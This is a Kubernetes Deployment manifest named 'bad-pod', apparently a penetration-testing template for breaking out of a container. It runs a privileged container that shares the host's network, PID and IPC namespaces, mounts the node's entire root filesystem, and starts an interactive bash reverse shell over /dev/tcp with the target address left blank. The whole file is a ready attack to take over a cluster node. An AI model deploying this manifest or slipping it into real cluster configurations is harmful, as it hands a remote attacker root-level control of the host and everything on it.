{"apiVersion":"apps/v1","kind":"Deployment","metadata":{"name":"bad-pod","labels":{"app":"bad-pod","type":"deployment"}},"spec":{"replicas":1,"selector":{"matchLabels":{"app":"bad-pod","type":"deployment"}},"template":{"metadata":{"labels":{"app":"bad-pod","type":"deployment"}},"spec":{"hostNetwork":true,"hostPID":true,"hostIPC":true,"containers":[{"name":"bad-pod","image":"ubuntu","command":["/bin/bash"],"args":["-c","bash -i >& /dev/tcp// 0>&1"],"securityContext":{"privileged":true},"volumeMounts":[{"mountPath":"/host","name":"noderoot"}]}],"volumes":[{"name":"noderoot","hostPath":{"path":"/"}}]}}}}